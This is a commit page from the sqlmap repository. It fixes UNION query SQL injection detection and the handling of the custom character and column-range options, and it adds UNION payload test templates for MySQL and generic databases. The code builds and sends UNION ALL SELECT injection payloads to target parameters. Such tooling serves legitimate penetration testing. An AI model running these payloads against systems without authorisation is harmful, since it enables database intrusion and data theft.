sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 09:36:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

Major bug fix to detect UNION query technique and various improvements to parsing and using of --union-char and --union-cols switches

Browse Source
This commit is contained in:
Bernardo Damele 2011-05-10 15:34:54 +00:00
parent 707edc7b1a
commit 3a8309c4b0
5 changed files with 301 additions and 49 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
lib/controller/checks.py
View File

@ -85,21 +85,29 @@ def checkSqlInjection(place, parameter, value):
stype = test.stype
clause = test.clause
if stype == 3:
if stype == PAYLOAD.TECHNIQUE.UNION:
configUnion(test.request.char)
if "[CHAR]" in title:
if conf.uChar is None:
continue
else:
title = title.replace("[CHAR]", conf.uChar)
elif "[RANDNUM]" in title or "(NULL)" in title:
title = title.replace("[RANDNUM]", "random number")
if test.request.columns == "[COLSTART]-[COLSTOP]":
if conf.uCols is None:
continue
else:
title = title.replace("[COLSTART]", str(conf.uColsStart))
title = title.replace("[COLSTOP]", str(conf.uColsStop))
if "[CHAR]" in title:
title = title.replace("[CHAR]", conf.uChar)
if "[RANDNUM]" in title:
title = title.replace("[RANDNUM]", "random number")
elif conf.uCols is not None:
debugMsg = "skipping test '%s' because the user " % title
debugMsg += "provided custom column range %s" % conf.uCols
logger.debug(debugMsg)
continue
# Skip test if the user's wants to test only for a specific
# technique
@ -132,8 +140,9 @@ def checkSqlInjection(place, parameter, value):
# value
# Parse test's <level>
if test.level > conf.level:
debugMsg = "skipping test '%s' because the level " % title
debugMsg += "is higher than the provided"
debugMsg = "skipping test '%s' because the level" % title
debugMsg += ", %d, is higher than the provided" % test.level
debugMsg += ", %d" % conf.level
logger.debug(debugMsg)
continue
@ -195,11 +204,10 @@ def checkSqlInjection(place, parameter, value):
logger.debug(debugMsg)
continue
# Skip test if the user provided custom column
# range and this is not a custom UNION test
if conf.uCols is not None and hasattr(test.request, "columns") and test.request.columns != "[COLSTART]-[COLSTOP]":
debugMsg = "skipping test '%s' because custom " % title
debugMsg += "UNION columns range was provided"
# Skip test if the user provided custom character
if conf.uChar is not None and ("random number" in title or "(NULL)" in title):
debugMsg = "skipping test '%s' because the user " % title
debugMsg += "provided a specific character, %s" % conf.uChar
logger.debug(debugMsg)
continue

1
lib/core/option.py
View File

@ -1366,6 +1366,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
kb.threadContinue = True
kb.threadException = False
kb.threadData = {}
kb.uChar = "NULL"
kb.xpCmdshellAvailable = False
kb.misc = advancedDict()

14
lib/techniques/inband/union/test.py
View File

@ -61,7 +61,7 @@ def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where
min_, max_ = MAX_RATIO, MIN_RATIO
for count in range(lowerCount, upperCount+1):
query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, conf.uChar)
query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, kb.uChar)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
page, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
ratio = comparison(page, True) or MIN_RATIO
@ -122,7 +122,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
randQueryUnescaped = unescaper.unescape(randQueryProcessed)
# Forge the inband SQL injection request
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar)
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
@ -141,7 +141,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
if content and phrase in content:
validPayload = payload
vector = (position, count, comment, prefix, suffix, conf.uChar, where)
vector = (position, count, comment, prefix, suffix, kb.uChar, where)
if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters
@ -151,7 +151,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
# Confirm that it is a full inband SQL injection
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar, multipleUnions=randQueryUnescaped2)
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=PAYLOAD.WHERE.NEGATIVE)
# Perform the request
@ -159,7 +159,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
if content and ((phrase in content and phrase2 not in content) or (phrase not in content and phrase2 in content)):
vector = (position, count, comment, prefix, suffix, conf.uChar, PAYLOAD.WHERE.NEGATIVE)
vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE)
if not unionErrorCase:
break
@ -190,7 +190,7 @@ def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix
validPayload = None
vector = None
query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)
query = agent.prefixQuery("UNION ALL SELECT %s" % kb.uChar)
total = conf.uColsStop+1 - conf.uColsStart
count = __findUnionCharCount(comment, place, parameter, value, prefix, suffix)
@ -200,7 +200,7 @@ def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix
query = query[:-len(FROM_TABLE[Backend.getIdentifiedDbms()])]
if count:
query += ", %s" % conf.uChar
query += ", %s" % kb.uChar
if Backend.getIdentifiedDbms() in FROM_TABLE:
query += FROM_TABLE[Backend.getIdentifiedDbms()]

26
lib/techniques/inband/union/use.py
View File

@ -88,13 +88,18 @@ def __oneShotUnionUse(expression, unpack=True):
def configUnion(char=None, columns=None):
def __configUnionChar(char):
if isinstance(char, basestring):
if any([char.isdigit(), char == "NULL", char == "[RANDNUM]"]):
conf.uChar = char
else:
conf.uChar = "'%s'" % char.strip("'")
if not isinstance(char, basestring):
return
kb.uChar = char
if conf.uChar is not None:
kb.uChar = char.replace("[CHAR]", conf.uChar if conf.uChar.isdigit() else "'%s'" % conf.uChar.strip("'"))
def __configUnionCols(columns):
if not isinstance(columns, basestring):
return
columns = columns.replace(" ", "")
colsStart, colsStop = columns.split("-")
@ -109,15 +114,8 @@ def configUnion(char=None, columns=None):
errMsg += "higher number of columns"
raise sqlmapSyntaxException, errMsg
if isinstance(conf.uChar, basestring):
__configUnionChar(conf.uChar)
elif isinstance(char, basestring):
__configUnionChar(char)
if isinstance(conf.uCols, basestring):
__configUnionCols(conf.uCols)
elif isinstance(columns, basestring):
__configUnionCols(columns)
__configUnionChar(char)
__configUnionCols(conf.uCols or columns)
def unionUse(expression, unpack=True, dump=False):
"""

273
xml/payloads.xml
View File

@ -2320,7 +2320,29 @@ Formats:
<!-- UNION query tests -->
<test>
<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns</title>
<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[CHAR]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
@ -2342,7 +2364,7 @@ Formats:
</test>
<test>
<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns</title>
<title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
@ -2371,6 +2393,28 @@ Formats:
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[CHAR]</char>
<columns>1-10</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query (NULL) - 1 to 10 columns</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
@ -2386,7 +2430,7 @@ Formats:
</test>
<test>
<title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
<title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
@ -2415,6 +2459,28 @@ Formats:
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[CHAR]</char>
<columns>11-20</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query (NULL) - 11 to 20 columns</title>
<stype>3</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
@ -2430,7 +2496,7 @@ Formats:
</test>
<test>
<title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>
<title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
@ -2459,6 +2525,28 @@ Formats:
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[CHAR]</char>
<columns>21-30</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query (NULL) - 21 to 30 columns</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
@ -2474,7 +2562,7 @@ Formats:
</test>
<test>
<title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>
<title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
<stype>3</stype>
<level>4</level>
<risk>1</risk>
@ -2503,6 +2591,28 @@ Formats:
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[CHAR]</char>
<columns>31-40</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query (NULL) - 31 to 40 columns</title>
<stype>3</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
@ -2518,7 +2628,7 @@ Formats:
</test>
<test>
<title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
<title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
<stype>3</stype>
<level>5</level>
<risk>1</risk>
@ -2547,6 +2657,28 @@ Formats:
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
<char>[CHAR]</char>
<columns>41-50</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL UNION query (NULL) - 41 to 50 columns</title>
<stype>3</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>#</comment>
@ -2562,7 +2694,7 @@ Formats:
</test>
<test>
<title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
<title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
<stype>3</stype>
<level>5</level>
<risk>1</risk>
@ -2584,7 +2716,26 @@ Formats:
</test>
<test>
<title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns</title>
<title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>--</comment>
<char>[CHAR]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
@ -2603,7 +2754,7 @@ Formats:
</test>
<test>
<title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns</title>
<title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
@ -2629,6 +2780,25 @@ Formats:
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>--</comment>
<char>[CHAR]</char>
<columns>1-10</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query (NULL) - 1 to 10 columns</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>--</comment>
@ -2641,7 +2811,7 @@ Formats:
</test>
<test>
<title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
<title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
@ -2667,6 +2837,25 @@ Formats:
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>--</comment>
<char>[CHAR]</char>
<columns>11-20</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query (NULL) - 11 to 20 columns</title>
<stype>3</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>--</comment>
@ -2679,7 +2868,7 @@ Formats:
</test>
<test>
<title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
<title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
@ -2705,6 +2894,25 @@ Formats:
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>--</comment>
<char>[CHAR]</char>
<columns>21-30</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query (NULL) - 21 to 30 columns</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>--</comment>
@ -2717,7 +2925,7 @@ Formats:
</test>
<test>
<title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
<title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
<stype>3</stype>
<level>4</level>
<risk>1</risk>
@ -2743,6 +2951,25 @@ Formats:
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>--</comment>
<char>[CHAR]</char>
<columns>31-40</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query (NULL) - 31 to 40 columns</title>
<stype>3</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>--</comment>
@ -2755,7 +2982,7 @@ Formats:
</test>
<test>
<title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
<title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
<stype>3</stype>
<level>5</level>
<risk>1</risk>
@ -2781,6 +3008,24 @@ Formats:
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>--</comment>
<char>[CHAR]</char>
<columns>41-50</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query (NULL) - 41 to 50 columns</title>
<stype>3</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>--</comment>
@ -2793,7 +3038,7 @@ Formats:
</test>
<test>
<title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
<title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
<stype>3</stype>
<level>5</level>
<risk>1</risk>